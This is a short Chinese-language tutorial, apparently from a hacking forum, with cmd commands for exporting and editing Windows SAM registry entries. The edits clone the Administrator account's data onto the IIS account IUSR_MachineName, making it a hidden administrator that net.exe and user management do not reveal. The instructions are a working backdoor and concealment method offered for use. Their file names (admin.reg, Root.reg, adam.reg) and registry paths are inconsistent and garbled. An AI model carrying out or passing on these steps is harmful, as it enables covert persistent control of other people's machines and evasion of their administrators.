在cmd下，

regedit /e admin.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4

将SID为500的管理员帐号的相关信息导出，然后编辑admin.reg文件，将admin.reg文件的第三行

[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4]

最后的’1F4’修改为IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9，如果机器在最初安装的时候没有安装IIS，而自己创建了帐号后再安装IIS就有可能不是这个值)，将Root.reg文件中的’1F4’修改为’3E9’后执行然后另外一个是你需要修改那个账号的值。

regedit /e iusr.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00003E9

将iusr.reg文件中“'V'=hex:0”开始一直到iusr.reg文件结束部分复制下来，然后替换掉adam.reg中同样位置的部分。最后使用 regedit /s adam.reg 导入该Reg文件，然后运行 net user IUSR_MachineName password 修改IUSR_MachineName的密码。ok，大功告成！

现在IUSR_MachineName账号拥有了管理员的权限，但是你使用net.exe和管理工具中的用户管理都将看不到任何痕迹，即使你去察看所属于的组和用户，都和修改前没有任何区别。